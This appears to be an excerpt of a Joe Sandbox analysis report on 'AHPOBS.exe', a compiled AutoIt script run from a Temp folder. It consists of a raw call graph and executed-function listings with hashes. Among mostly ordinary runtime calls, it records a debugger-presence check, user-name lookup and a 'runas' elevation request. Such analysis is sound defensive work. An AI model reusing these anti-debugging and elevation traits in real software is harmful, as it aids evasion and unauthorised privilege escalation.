87506 479aed 87504->87506 87505->87506 87508 479798 87505->87508 87568 451b42 61 API calls 87506->87568 87510 4797a2 87508->87510 87511 4797be 87508->87511 87509 479b00 87509->87495 87560 451b42 61 API calls 87510->87560 87513 4797c7 87511->87513 87514 4797e3 87511->87514 87561 451b42 61 API calls 87513->87561 87544 441eba 87514->87544 87516 4797b5 87516->87495 87518 4797f7 87520 479815 87518->87520 87521 4797fe 87518->87521 87519 4797da 87519->87495 87525 47983c 87520->87525 87549 451d2b 87520->87549 87562 451b42 61 API calls 87521->87562 87523 47980c 87523->87495 87529 4798e6 87525->87529 87563 479714 110 API calls 87525->87563 87526 47994b VariantInit 87533 479980 __cftof2_l 87526->87533 87529->87526 87530 479916 VariantClear 87529->87530 87530->87529 87531 479a44 87566 468070 104 API calls ctype 87531->87566 87532 479a0b 87534 479a2c 87532->87534 87535 479a12 87532->87535 87533->87531 87533->87532 87533->87534 87565 451b42 61 API calls 87534->87565 87564 451b42 61 API calls 87535->87564 87539 479a24 87540 479aca VariantClear 87539->87540 87541 479adb 87540->87541 87541->87495 87542 479a50 87542->87540 87567 468070 104 API calls ctype 87542->87567 87545 441f12 87544->87545 87546 441ecc _wcslen 87544->87546 87545->87518 87546->87545 87547 410160 52 API calls 87546->87547 87548 441ede 87547->87548 87548->87518 87552 451d5e 87549->87552 87550 451e93 SysFreeString 87553 451ea0 87550->87553 87551 451f21 87551->87553 87554 451f6d lstrcmpiW 87551->87554 87555 451f7f SysFreeString 87551->87555 87558 451fab 87551->87558 87552->87550 87552->87551 87552->87553 87559 451d68 87552->87559 87553->87559 87569 44a545 RaiseException 87553->87569 87554->87555 87557 451fc7 SysFreeString 87554->87557 87555->87551 87557->87553 87558->87525 87559->87525 87560->87516 87561->87519 87562->87523 87563->87525 87564->87539 87565->87539 87566->87542 87567->87542 87568->87509 87569->87553 87570 425b2b 87575 40f000 87570->87575 87574 425b3a 87576 4115d7 52 API calls 87575->87576 87577 40f007 87576->87577 87578 4276ea 87577->87578 87584 40f030 87577->87584 87583 41130a 51 API calls __cinit 87583->87574 87585 40f039 87584->87585 87586 40f01a 87584->87586 87614 41130a 51 API calls __cinit 87585->87614 87588 40e500 87586->87588 87589 40bc70 52 API calls 87588->87589 87590 40e515 GetVersionExW 87589->87590 87591 402160 52 API calls 87590->87591 87592 40e557 87591->87592 87615 40e660 87592->87615 87595 40e680 52 API calls 87597 40e566 87595->87597 87598 427674 87597->87598 87620 40ef60 87597->87620 87602 4276c6 GetSystemInfo 87598->87602 87600 40e5e0 87604 4276d5 GetSystemInfo 87600->87604 87624 40efd0 87600->87624 87601 40e5cd GetCurrentProcess 87631 40ef20 LoadLibraryA GetProcAddress 87601->87631 87602->87604 87607 40e629 87628 40ef90 87607->87628 87610 40e641 FreeLibrary 87611 40e644 87610->87611 87612 40e653 FreeLibrary 87611->87612 87613 40e656 87611->87613 87612->87613 87613->87583 87614->87586 87616 40e667 87615->87616 87617 42761d 87616->87617 87618 40c600 52 API calls 87616->87618 87619 40e55c 87618->87619 87619->87595 87621 40e5c8 87620->87621 87622 40ef66 LoadLibraryA 87620->87622 87621->87600 87621->87601 87622->87621 87623 40ef77 GetProcAddress 87622->87623 87623->87621 87625 40e620 87624->87625 87626 40efd6 LoadLibraryA 87624->87626 87625->87602 87625->87607 87626->87625 87627 40efe7 GetProcAddress 87626->87627 87627->87625 87632 40efb0 LoadLibraryA GetProcAddress 87628->87632 87630 40e632 GetNativeSystemInfo 87630->87610 87630->87611 87631->87600 87632->87630 87633 40b2cd 87636 40bf20 87633->87636 87637 40bf39 87636->87637 87638 42bdba 87637->87638 87639 40bf78 87637->87639 87765 45e737 90 API calls 3 library calls 87638->87765 87641 40c2c0 52 API calls 87639->87641 87642 40bfa8 87641->87642 87644 408f40 VariantClear 87642->87644 87649 40bfe8 87642->87649 87643 408f40 VariantClear 87645 42c185 87643->87645 87647 40bfbb 87644->87647 87650 408f40 VariantClear 87645->87650 87646 40bff5 87651 42be23 87646->87651 87652 40c00c 87646->87652 87664 42bdcd 87646->87664 87648 401980 53 API calls 87647->87648 87653 40bfd6 87648->87653 87649->87646 87670 40c1dd 87649->87670 87766 40c4e0 387 API calls 87649->87766 87655 42c18d 87650->87655 87704 40c07f 87651->87704 87767 45e737 90 API calls 3 library calls 87651->87767 87656 40a780 387 API calls 87652->87656 87658 40c2c0 52 API calls 87653->87658 87778 452670 VariantClear 87655->87778 87660 40c022 87656->87660 87658->87649 87660->87664 87760 408e80 VariantClear 87660->87760 87662 40a780 387 API calls 87662->87704 87663 42c196 87663->87663 87664->87643 87666 40c035 87669 40a780 387 API calls 87666->87669 87666->87670 87671 40c06b 87669->87671 87777 45e737 90 API calls 3 library calls 87670->87777 87671->87664 87761 408e80 VariantClear 87671->87761 87673 452670 VariantClear 87673->87704 87674 452f05 VariantClear 87674->87704 87675 40cf00 53 API calls 87675->87704 87677 408e80 VariantClear 87677->87704 87678 40c147 87680 40c151 87678->87680 87681 42c0df 87678->87681 87679 408f40 VariantClear 87679->87704 87682 408f40 VariantClear 87680->87682 87683 408f40 VariantClear 87681->87683 87684 40c159 87682->87684 87685 42c0f2 87683->87685 87762 40c670 88 API calls 87684->87762 87774 40ceb0 53 API calls 87685->87774 87688 42c111 87775 467c5c 88 API calls 87688->87775 87689 40c16d 87689->87688 87763 40c670 88 API calls 87689->87763 87693 42c134 87693->87670 87776 40ceb0 53 API calls 87693->87776 87694 40c180 87694->87688 87695 40c188 87694->87695 87764 40ceb0 53 API calls 87695->87764 87697 42c0bc 87771 408e80 VariantClear 87697->87771 87699 40c199 87705 408f40 VariantClear 87699->87705 87701 40e710 53 API calls 87701->87704 87702 42c0c5 87772 408e80 VariantClear 87702->87772 87704->87662 87704->87664 87704->87670 87704->87673 87704->87674 87704->87675 87704->87677 87704->87678 87704->87679 87704->87681 87704->87697 87704->87701 87715 46c84c 87704->87715 87768 45e951 53 API calls 87704->87768 87769 451b42 61 API calls 87704->87769 87770 45e737 90 API calls 3 library calls 87704->87770 87707 40c1af 87705->87707 87706 42c0d1 87773 40ceb0 53 API calls 87706->87773 87709 408f40 VariantClear 87707->87709 87710 40c1b7 87709->87710 87711 408f40 VariantClear 87710->87711 87712 40c1bf 87711->87712 87713 408f40 VariantClear 87712->87713 87714 40b2d8 87713->87714 87719 46c8a3 __cftof2_l 87715->87719 87716 46ca96 87788 451b42 61 API calls 87716->87788 87718 46cb56 87718->87704 87719->87716 87720 46ca4a 87719->87720 87723 46ca74 87719->87723 87726 46c8e1 87719->87726 87721 46ca90 87720->87721 87722 46ca58 87720->87722 87721->87716 87727 46caa2 VariantInit VariantClear 87721->87727 87784 451b42 61 API calls 87722->87784 87785 451b42 61 API calls 87723->87785 87730 46c8e8 87726->87730 87736 46c904 87726->87736 87732 46cacb 87727->87732 87728 46ca6b 87728->87704 87729 46ca87 87729->87704 87779 451b42 61 API calls 87730->87779 87734 46cafb 87732->87734 87735 46cad6 87732->87735 87733 46c8fb 87733->87704 87738 46cb05 87734->87738 87739 408f40 VariantClear 87734->87739 87737 408f40 VariantClear 87735->87737 87742 46c95e VariantInit 87736->87742 87740 46cadb 87737->87740 87787 468070 104 API calls ctype 87738->87787 87739->87738 87786 451b42 61 API calls 87740->87786 87746 46c99c 87742->87746 87744 46caf2 87744->87704 87745 46cb2e VariantClear 87745->87704 87747 46c9ae 87746->87747 87754 46c9e4 87746->87754 87748 46c9d0 87747->87748 87749 46c9b9 87747->87749 87781 451b42 61 API calls 87748->87781 87780 451b42 61 API calls 87749->87780 87752 46c9db 87752->87704 87753 46c9c7 87753->87704 87754->87716 87755 46ca37 87754->87755 87756 46ca1d 87754->87756 87783 468070 104 API calls ctype 87755->87783 87782 451b42 61 API calls 87756->87782 87758 46ca2e 87758->87704 87760->87666 87761->87704 87762->87689 87763->87694 87764->87699 87765->87664 87766->87646 87767->87704 87768->87704 87769->87704 87770->87704 87771->87702 87772->87706 87773->87681 87774->87688 87775->87693 87776->87670 87777->87664 87778->87663 87779->87733 87780->87753 87781->87752 87782->87758 87783->87720 87784->87728 87785->87729 87786->87744 87787->87745 87788->87718 87789 425b6f 87794 40dc90 87789->87794 87793 425b7e 87795 40bc70 52 API calls 87794->87795 87796 40dd03 87795->87796 87802 40f210 87796->87802 87798 40dd96 87800 40ddb7 87798->87800 87805 40dc00 52 API calls 2 library calls 87798->87805 87801 41130a 51 API calls __cinit 87800->87801 87801->87793 87806 40f250 RegOpenKeyExW 87802->87806 87804 40f230 87804->87798 87805->87798 87807 425e17 87806->87807 87808 40f275 RegQueryValueExW 87806->87808 87807->87804 87809 40f2c3 RegCloseKey 87808->87809 87810 40f298 87808->87810 87809->87804 87811 40f2a9 RegCloseKey 87810->87811 87812 425e1d 87810->87812 87811->87804 87813 42b1d2 87814 40bc10 53 API calls 87813->87814 87815 42b1e0 87814->87815 87822 4720db 87815->87822 87817 42b228 87909 45e737 90 API calls 3 library calls 87817->87909 87819 42bb6a 87910 44b92d VariantClear 87819->87910 87821 42bc5b 87823 472108 __cftof2_l 87822->87823 87824 4721d1 87823->87824 87825 47215e 87823->87825 87827 47226d 87824->87827 87829 472545 SHGetFolderPathW 87824->87829 87830 472324 87824->87830 87831 4724a1 87824->87831 87832 4723ae 87824->87832 87833 4725ad SHGetFolderPathW 87824->87833 87834 47252b SHGetFolderPathW 87824->87834 87835 472369 87824->87835 87836 4724f7 SHGetFolderPathW 87824->87836 87837 472255 87824->87837 87838 472274 87824->87838 87839 4723f3 87824->87839 87840 472593 SHGetFolderPathW 87824->87840 87841 472511 SHGetFolderPathW 87824->87841 87842 4722df 87824->87842 87843 47255f SHGetFolderPathW 87824->87843 87844 47229e GetLocalTime 87824->87844 87845 47247d 87824->87845 87846 4724dd SHGetFolderPathW 87824->87846 87847 472579 SHGetFolderPathW 87824->87847 87848 472438 87824->87848 87826 401b10 52 API calls 87825->87826 87828 47216b 87826->87828 87827->87817 87911 40bd50 52 API calls 87828->87911 87851 4722be 87829->87851 87918 441e23 GetSystemTimeAsFileTime 87830->87918 87935 441e23 GetSystemTimeAsFileTime 87831->87935 87924 441e23 GetSystemTimeAsFileTime 87832->87924 87833->87851 87834->87851 87921 441e23 GetSystemTimeAsFileTime 87835->87921 87836->87851 87870 408f40 VariantClear 87837->87870 87913 408e80 VariantClear 87838->87913 87927 441e23 GetSystemTimeAsFileTime 87839->87927 87840->87851 87841->87851 87915 441e23 GetSystemTimeAsFileTime 87842->87915 87843->87851 87853 4722b9 87844->87853 87933 441e23 GetSystemTimeAsFileTime 87845->87933 87846->87851 87847->87851 87930 441e23 GetSystemTimeAsFileTime 87848->87930 87877 40e710 53 API calls 87851->87877 87914 41329b 79 API calls 3 library calls 87853->87914 87860 47233c 87919 451aa8 91 API calls _strftime 87860->87919 87861 47240b 87928 451aa8 91 API calls _strftime 87861->87928 87862 472381 87922 451aa8 91 API calls _strftime 87862->87922 87864 47217d 87875 40c2c0 52 API calls 87864->87875 87865 472450 87931 451aa8 91 API calls _strftime 87865->87931 87866 4722f7 87916 451aa8 91 API calls _strftime 87866->87916 87867 4723c6 87925 451aa8 91 API calls _strftime 87867->87925 87868 472489 87934 451b19 83 API calls 87868->87934 87869 4724b3 87936 451aa8 91 API calls _strftime 87869->87936 87870->87827 87887 47218c 87875->87887 87889 4722cc 87877->87889 87882 4724b9 87937 40e6a0 53 API calls 87882->87937 87883 472342 87920 40e6a0 53 API calls 87883->87920 87884 472411 87929 40e6a0 53 API calls 87884->87929 87885 47228b 87885->87817 87886 472387 87923 40e6a0 53 API calls 87886->87923 87908 472193 87887->87908 87912 408e80 VariantClear 87887->87912 87888 472456 87932 40e6a0 53 API calls 87888->87932 87889->87817 87890 4722fd 87917 40e6a0 53 API calls 87890->87917 87891 4723cc 87926 40e6a0 53 API calls 87891->87926 87899 4724c2 87899->87817 87900 47234b 87900->87817 87901 47241a 87901->87817 87902 472390 87902->87817 87903 47245f 87903->87817 87905 472306 87905->87817 87906 4723d5 87906->87817 87907 4721b6 87907->87817 87908->87817 87909->87819 87910->87821 87911->87864 87912->87907 87913->87885 87914->87851 87915->87866 87916->87890 87917->87905 87918->87860 87919->87883 87920->87900 87921->87862 87922->87886 87923->87902 87924->87867 87925->87891 87926->87906 87927->87861 87928->87884 87929->87901 87930->87865 87931->87888 87932->87903 87933->87868 87934->87853 87935->87869 87936->87882 87937->87899 87938 416454 87975 416c70 87938->87975 87940 416460 GetStartupInfoW 87941 416474 87940->87941 87976 419d5a HeapCreate 87941->87976 87943 4164cd 87944 4164d8 87943->87944 88060 41642b 46 API calls 3 library calls 87943->88060 87977 417c20 GetModuleHandleW 87944->87977 87947 4164de 87948 4164e9 __RTC_Initialize 87947->87948 88061 41642b 46 API calls 3 library calls 87947->88061 87996 41aaa1 GetStartupInfoW 87948->87996 87952 416503 GetCommandLineW 88009 41f584 GetEnvironmentStringsW 87952->88009 87955 416513 88015 41f4d6 GetModuleFileNameW 87955->88015 87958 41651d 87959 416528 87958->87959 88063 411924 46 API calls 3 library calls 87958->88063 88019 41f2a4 87959->88019 87962 41652e 87963 416539 87962->87963 88064 411924 46 API calls 3 library calls 87962->88064 88033 411703 87963->88033 87966 416541 87968 41654c __wwincmdln 87966->87968 88065 411924 46 API calls 3 library calls 87966->88065 88037 40d6b0 87968->88037 87975->87940 87976->87943 87978 417c34 87977->87978 87979 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 87977->87979 88068 4178ff 49 API calls _free 87978->88068 87981 417c87 TlsAlloc 87979->87981 87984 417cd5 TlsSetValue 87981->87984 87985 417d96 87981->87985 87982 417c39 87982->87947 87984->87985 87986 417ce6 __init_pointers 87984->87986 87985->87947 88069 418151 InitializeCriticalSectionAndSpinCount 87986->88069 87988 417d91 88077 4178ff 49 API calls _free 87988->88077 87990 417d2a 87990->87988 88070 416b49 87990->88070 87993 417d76 88076 41793c 46 API calls 4 library calls 87993->88076 87995 417d7e GetCurrentThreadId 87995->87985 87997 416b49 __calloc_crt 46 API calls 87996->87997 88008 41aabf 87997->88008 87998 41ac34 87999 41ac6a GetStdHandle 87998->87999 88001 41acce SetHandleCount 87998->88001 88002 41ac7c GetFileType 87998->88002 88007 41aca2 InitializeCriticalSectionAndSpinCount 87998->88007 87999->87998 88000 416b49 __calloc_crt 46 API calls 88000->88008 88003 4164f7 88001->88003 88002->87998 88003->87952 88062 411924 46 API calls 3 library calls 88003->88062 88004 41abb4 88004->87998 88005 41abe0 GetFileType 88004->88005 88006 41abeb InitializeCriticalSectionAndSpinCount 88004->88006 88005->88004 88005->88006 88006->88003 88006->88004 88007->87998 88007->88003 88008->87998 88008->88000 88008->88003 88008->88004 88008->88008 88010 41f595 88009->88010 88011 41f599 88009->88011 88010->87955 88087 416b04 88011->88087 88013 41f5bb _memmove 88014 41f5c2 FreeEnvironmentStringsW 88013->88014 88014->87955 88017 41f50b _wparse_cmdline 88015->88017 88016 41f54e _wparse_cmdline 88016->87958 88017->88016 88018 416b04 __malloc_crt 46 API calls 88017->88018 88018->88016 88020 41f2bc _wcslen 88019->88020 88024 41f2b4 88019->88024 88021 416b49 __calloc_crt 46 API calls 88020->88021 88026 41f2e0 _wcslen 88021->88026 88022 41f336 88094 413748 88022->88094 88024->87962 88025 416b49 __calloc_crt 46 API calls 88025->88026 88026->88022 88026->88024 88026->88025 88027 41f35c 88026->88027 88030 41f373 88026->88030 88093 41ef12 46 API calls ___strgtold12_l 88026->88093 88028 413748 _free 46 API calls 88027->88028 88028->88024 88100 417ed3 88030->88100 88032 41f37f 88032->87962 88034 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 88033->88034 88036 411750 __IsNonwritableInCurrentImage 88034->88036 88119 41130a 51 API calls __cinit 88034->88119 88036->87966 88038 42e2f3 88037->88038 88039 40d6cc 88037->88039 88040 408f40 VariantClear 88039->88040 88041 40d707 88040->88041 88120 40ebb0 88041->88120 88044 40d737 88123 411951 88044->88123 88049 40d751 88135 40f4e0 SystemParametersInfoW SystemParametersInfoW 88049->88135 88051 40d75f 88136 40d590 GetCurrentDirectoryW 88051->88136 88060->87944 88061->87948 88068->87982 88069->87990 88072 416b52 88070->88072 88073 416b8f 88072->88073 88074 416b70 Sleep 88072->88074 88078 41f677 88072->88078 88073->87988 88073->87993 88075 416b85 88074->88075 88075->88072 88075->88073 88076->87995 88077->87985 88079 41f683 88078->88079 88085 41f69e _malloc 88078->88085 88080 41f68f 88079->88080 88079->88085 88086 417f77 46 API calls __getptd_noexit 88080->88086 88082 41f6b1 HeapAlloc 88084 41f6d8 88082->88084 88082->88085 88083 41f694 88083->88072 88084->88072 88085->88082 88085->88084 88086->88083 88090 416b0d 88087->88090 88088 4135bb _malloc 45 API calls 88088->88090 88089 416b43 88089->88013 88090->88088 88090->88089 88091 416b24 Sleep 88090->88091 88092 416b39 88091->88092 88092->88089 88092->88090 88093->88026 88095 413753 RtlFreeHeap 88094->88095 88099 41377c _free 88094->88099 88096 413768 88095->88096 88095->88099 88103 417f77 46 API calls __getptd_noexit 88096->88103 88098 41376e GetLastError 88098->88099 88099->88024 88104 417daa 88100->88104 88103->88098 88105 417dc9 __cftof2_l __call_reportfault 88104->88105 88106 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 88105->88106 88108 417eb5 __call_reportfault 88106->88108 88110 41a208 88108->88110 88109 417ed1 GetCurrentProcess TerminateProcess 88109->88032 88111 41a210 88110->88111 88112 41a212 IsDebuggerPresent 88110->88112 88111->88109 88118 41fe19 88112->88118 88115 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 88116 421ff0 __call_reportfault 88115->88116 88117 421ff8 GetCurrentProcess TerminateProcess 88115->88117 88116->88117 88117->88109 88118->88115 88119->88036 88176 40ebd0 88120->88176 88180 4182cb 88123->88180 88125 41195e 88187 4181f2 LeaveCriticalSection 88125->88187 88127 40d748 88128 4119b0 88127->88128 88129 4119d6 88128->88129 88130 4119bc 88128->88130 88129->88049 88130->88129 88222 417f77 46 API calls __getptd_noexit 88130->88222 88132 4119c6 88223 417f25 10 API calls ___strgtold12_l 88132->88223 88134 4119d1 88134->88049 88135->88051 88224 401f20 88136->88224 88175 40ec00 LoadLibraryA GetProcAddress 88175->88044 88177 40d72e 88176->88177 88178 40ebd6 LoadLibraryA 88176->88178 88177->88044 88177->88175 88178->88177 88179 40ebe7 GetProcAddress 88178->88179 88179->88177 88181 4182e0 88180->88181 88182 4182f3 EnterCriticalSection 88180->88182 88188 418209 88181->88188 88182->88125 88184 4182e6 88184->88182 88215 411924 46 API calls 3 library calls 88184->88215 88187->88127 88189 418215 type_info::_Type_info_dtor 88188->88189 88190 418225 88189->88190 88191 41823d 88189->88191 88216 418901 46 API calls __NMSG_WRITE 88190->88216 88194 416b04 __malloc_crt 45 API calls 88191->88194 88197 41824b type_info::_Type_info_dtor 88191->88197 88193 41822a 88217 418752 46 API calls 8 library calls 88193->88217 88196 418256 88194->88196 88199 41825d 88196->88199 88200 41826c 88196->88200 88197->88184 88198 418231 88218 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 88198->88218 88219 417f77 46 API calls __getptd_noexit 88199->88219 88202 4182cb __lock 45 API calls 88200->88202 88204 418273 88202->88204 88206 4182a6 88204->88206 88207 41827b InitializeCriticalSectionAndSpinCount 88204->88207 88210 413748 _free 45 API calls 88206->88210 88208 418297 88207->88208 88209 41828b 88207->88209 88221 4182c2 LeaveCriticalSection _doexit 88208->88221 88211 413748 _free 45 API calls 88209->88211 88210->88208 88216->88193 88217->88198 88219->88197 88221->88197 88222->88132 88223->88134 88334 40e6e0 88224->88334 89167 472c3f GetUserNameW 89168 40b2b9 89171 40ccd0 89168->89171 89170 40b2c4 89211 40cc70 89171->89211 89173 40ccf3 89174 42c3bb 89173->89174 89175 40cd1b 89173->89175 89187 40cd8a ctype 89173->89187 89231 45e737 90 API calls 3 library calls 89174->89231 89180 40cd30 89175->89180 89199 40cdad 89175->89199 89177 40cd72 89179 402780 52 API calls 89177->89179 89178 402780 52 API calls 89178->89180 89181 40cd80 89179->89181 89180->89177 89180->89178 89180->89187 89220 40e7d0 387 API calls 89181->89220 89182 40ce40 89221 40ceb0 53 API calls 89182->89221 89185 40ce53 89186 408f40 VariantClear 89185->89186 89188 40ce5b 89186->89188 89187->89170 89191 408f40 VariantClear 89188->89191 89189 42c3a0 89229 45e737 90 API calls 3 library calls 89189->89229 89190 42c31a 89222 45e737 90 API calls 3 library calls 89190->89222 89194 40ce63 89191->89194 89194->89170 89195 42c3ad 89230 452670 VariantClear 89195->89230 89196 40cc70 387 API calls 89196->89199 89197 42c327 89223 452670 VariantClear 89197->89223 89199->89182 89199->89189 89199->89190 89199->89196 89201 42c335 89199->89201 89202 42c370 89199->89202 89206 42c343 89199->89206 89224 452670 VariantClear 89201->89224 89227 45e737 90 API calls 3 library calls 89202->89227 89205 42c392 89228 452670 VariantClear 89205->89228 89225 45e737 90 API calls 3 library calls 89206->89225 89209 42c362 89226 452670 VariantClear 89209->89226 89212 40a780 387 API calls 89211->89212 89213 40cc96 89212->89213 89214 42bd0e 89213->89214 89215 40cc9e 89213->89215 89216 408f40 VariantClear 89214->89216 89218 408f40 VariantClear 89215->89218 89217 42bd16 89216->89217 89217->89173 89219 40ccb8 89218->89219 89219->89173 89220->89187 89221->89185 89222->89197 89223->89187 89224->89187 89225->89209 89226->89187 89227->89205 89228->89187 89229->89195 89230->89187 89231->89187 89232 40b99a 89233 4115d7 52 API calls 89232->89233 89234 40b9a1 89233->89234 89235 425b5e 89240 40c7f0 89235->89240 89239 425b6d 89275 40db10 52 API calls 89240->89275 89242 40c82a 89276 410ab0 6 API calls 89242->89276 89244 40c86d 89245 40bc70 52 API calls 89244->89245 89246 40c877 89245->89246 89247 40bc70 52 API calls 89246->89247 89248 40c881 89247->89248 89249 40bc70 52 API calls 89248->89249 89250 40c88b 89249->89250 89251 40bc70 52 API calls 89250->89251 89252 40c8d1 89251->89252 89253 40bc70 52 API calls 89252->89253 89254 40c991 89253->89254 89277 40d2c0 52 API calls 89254->89277 89256 40c99b 89278 40d0d0 53 API calls 89256->89278 89258 40c9c1 89259 40bc70 52 API calls 89258->89259 89260 40c9cb 89259->89260 89279 40e310 53 API calls 89260->89279 89262 40ca28 89263 408f40 VariantClear 89262->89263 89264 40ca30 89263->89264 89265 408f40 VariantClear 89264->89265 89266 40ca38 GetStdHandle 89265->89266 89267 429630 89266->89267 89268 40ca87 89266->89268 89267->89268 89269 429639 89267->89269 89274 41130a 51 API calls __cinit 89268->89274 89280 4432c0 57 API calls 89269->89280 89271 429641 89281 44b6ab CreateThread 89271->89281 89273 42964f CloseHandle 89273->89268 89274->89239 89275->89242 89276->89244 89277->89256 89278->89258 89279->89262 89280->89271 89281->89273 89282 44b5cb 58 API calls 89281->89282

                                      Executed Functions

                                      Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcslen.LIBCMT ref: 004096C1
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • _memmove.LIBCMT ref: 0040970C
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                      • _memmove.LIBCMT ref: 00409D96
                                      • _memmove.LIBCMT ref: 0040A6C4
                                      • _memmove.LIBCMT ref: 004297E5
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                      • String ID:
                                      • API String ID: 2383988440-0
                                      • Opcode ID: 3eb26635e6d2b96681982449c4f16249f7fd6930bd10e391eb5d64f23315697c
                                      • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                      • Opcode Fuzzy Hash: 3eb26635e6d2b96681982449c4f16249f7fd6930bd10e391eb5d64f23315697c
                                      • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                      Function 0040D590 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                        • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\AHPOBS.exe,00000104,?), ref: 00401F4C
                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                        • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                      • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                      • GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Local\Temp\AHPOBS.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                        • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                      • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                      • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                      • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                        • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                        • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                        • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                        • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                        • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                        • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                        • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                        • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                        • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                        • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                        • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                        • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                      • String ID: C:\Users\user\AppData\Local\Temp\AHPOBS.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                      • API String ID: 2495805114-3892987466
                                      • Opcode ID: 41e582475c413773e3743a4b8e51b79ae17ec4e07ea1e63541618b073f9d51de
